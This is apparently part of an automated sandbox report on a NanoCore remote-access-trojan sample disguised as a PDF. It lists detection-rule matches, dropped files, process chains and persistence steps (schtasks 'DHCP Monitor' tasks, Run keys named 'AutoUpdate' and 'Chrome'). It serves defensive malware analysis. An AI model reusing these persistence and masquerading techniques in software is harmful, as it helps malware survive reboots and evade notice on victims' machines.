      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: String function: 00330DC0 appears 46 times
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: String function: 0032FD60 appears 40 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: String function: 00CDEC50 appears 56 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: String function: 00CDEB78 appears 39 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: String function: 00CDF5F0 appears 31 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameautoruns.exeL, vs 026910003102350.pdf.scr.exe
      Source: 026910003102350.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@43/44@4/2
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile read: C:\Windows\win.iniJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC6C74 GetLastError,FormatMessageW,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: 026910003102350.pdf.scr.exeReversingLabs: Detection: 46%
      Source: 026910003102350.pdf.scr.exeVirustotal: Detection: 45%
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile read: C:\Users\user\Desktop\026910003102350.pdf.scr.exeJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\026910003102350.pdf.scr.exe C:\Users\user\Desktop\026910003102350.pdf.scr.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037194F AdjustTokenPrivileges,CloseHandle,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\temp\Folder8_410Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00394089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00385B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0039AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: sfxname
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: sfxstime
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: STARTDLG
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile written: C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.iniJump to behavior
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: 026910003102350.pdf.scr.exeStatic file information: File size 1064658 > 1048576
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 026910003102350.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF640 push ecx; ret
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDEB78 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00360332 push edi; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330E06 push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032DBFA push cs; iretd
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032DC00 push eax; iretd
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
      Source: 026910003102350.pdf.scr.exeStatic PE information: section name: .didat
      Source: itugx.exe.0.drStatic PE information: real checksum: 0xe50ad should be: 0xe9063
      Source: 026910003102350.pdf.scr.exeStatic PE information: real checksum: 0x0 should be: 0x1079dd
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder8_410\__tmp_rar_sfx_access_check_5500781Jump to behavior
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Boot Survival

      barindex
      Creates multiple autostart registry keys
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Creates autostart registry keys with suspicious values (likely registry only malware)
